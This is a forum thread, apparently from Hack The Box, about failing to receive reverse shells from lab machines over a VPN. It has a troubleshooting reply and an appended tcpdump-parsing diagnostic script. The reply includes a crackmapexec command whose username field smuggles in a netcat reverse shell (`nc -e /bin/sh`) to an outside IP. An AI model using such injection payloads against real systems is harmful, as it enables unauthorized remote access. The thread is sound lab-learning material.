Impossible getting reverse-shell

Hey everyone,

I put the topic in the “other” category because it’s not due to the machine or HTB itself, but there’s no way for me to get a reverse shell on any machine. Same problem on TryHackMe.
My tun0 is set, I can nmap the machine and do everything I need, but every time I try to get a reverse shell (from Metasploit / other reverse shells or scripts) my netcat doesn’t catch anything on the specific port (the shell is sent to the HTB tun0 IP, of course).
I’m running ovpn on Ubuntu 20 without any VM. I tried to purge and reinstall ovpn and netcat, reset the .ovpn file, disable my firewall, and tried on TryHackMe too, but same thing. I have no idea where the problem comes from. I didn’t try on another computer though.

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.10.14.11 netmask 255.255.254.0 destination 10.10.14.11

Example: python3 usermap_script.py 10.10.10.3 445 10.10.14.11 4444
but netcat didn’t catch anything, just "Listening on 0.0.0.0 4444"
I’m not sure if the problem comes from

I tried to search on the forum to see if anyone already had the problem but didn’t see anything, so here I am.

Thanks for answers.

@kelayuu said:

Hey everyone,

I put the topic in the “other” category because it’s not due to the machine or HTB itself, but there’s no way for me to get a reverse shell on any machine. Same problem on TryHackMe.

If it happens everywhere then it is a good hint that the problem is on your machine with how you are trying to generate the shell.

First, you need to make sure you understand your machine.

  • Is the firewall turned off?
  • If you have a VPN, is there any host security which might be intercepting the traffic?
  • Do you have some other configuration which blocks inbound traffic?

Next you need to troubleshoot - tcpdump or Wireshark are good for this because you need to see if the packets are coming in. Also try other tools to see if they work (usermap_script.py seems a bit erratic).

If you can get a shell using MSF, then you’ve eliminated network issues.

Try CME for example:

crackmapexec smb --shares 10.10.10.3 -u './=`nohup nc -e /bin/sh 10.10.11.14 4444`' -p ''

Other than that, it’s down to trying things and seeing what the results are.
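
The packet check suggested in the reply above, as an added example that is not part of the original thread: it reads the text output of `tcpdump -n -i tun0 tcp port 4444` and says which side of the listener the problem is on. The function name, verdict strings and sample capture lines are constructed for illustration; the addresses and port are the ones quoted in the thread.

```python
import re

# Matches the address/port/flags part of a `tcpdump -n` TCP line, e.g.
# "... IP 10.10.10.3.40112 > 10.10.14.11.4444: Flags [S], seq ..."
TCP_LINE = re.compile(
    r"IP (?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r"Flags \[(?P<flags>[^\]]+)\]"
)

# Verdict names are made up for this example.
VERDICTS = {
    "no-inbound-syn": "nothing reached the interface: check the callback "
                      "address, the route, and whether the remote side ran",
    "refused": "SYN arrived and was answered with RST: no listener on that "
               "address/port (or a reject rule)",
    "syn-dropped": "SYN arrived but got no answer: a local firewall or "
                   "host-security product is dropping it",
    "handshake-ok": "SYN and SYN-ACK seen: the network path works, look at "
                    "the listener or the payload instead",
}

def diagnose(capture: str, local_ip: str, port: int) -> str:
    """Classify tcpdump text output for one local listener address and port."""
    syn_in = synack_out = rst_out = False
    for line in capture.splitlines():
        m = TCP_LINE.search(line)
        if not m:
            continue  # non-TCP line or tcpdump banner
        flags = m["flags"]
        inbound = m["dst"] == local_ip and int(m["dport"]) == port
        outbound = m["src"] == local_ip and int(m["sport"]) == port
        if inbound and flags == "S":        # bare SYN from the remote host
            syn_in = True
        elif outbound and flags == "S.":    # our SYN-ACK
            synack_out = True
        elif outbound and "R" in flags:     # our RST / RST-ACK
            rst_out = True
    if not syn_in:
        return "no-inbound-syn"
    if synack_out:
        return "handshake-ok"
    return "refused" if rst_out else "syn-dropped"

# Constructed capture: the remote host retries its SYN and never gets a reply.
SAMPLE = """\
12:00:01.000001 IP 10.10.10.3.40112 > 10.10.14.11.4444: Flags [S], seq 1000, win 64240, length 0
12:00:02.000001 IP 10.10.10.3.40112 > 10.10.14.11.4444: Flags [S], seq 1000, win 64240, length 0
"""

if __name__ == "__main__":
    verdict = diagnose(SAMPLE, "10.10.14.11", 4444)
    print(verdict, "->", VERDICTS[verdict])
```

An empty capture while the listener is waiting gives `no-inbound-syn`, which points away from the local firewall and toward the address, route or remote command.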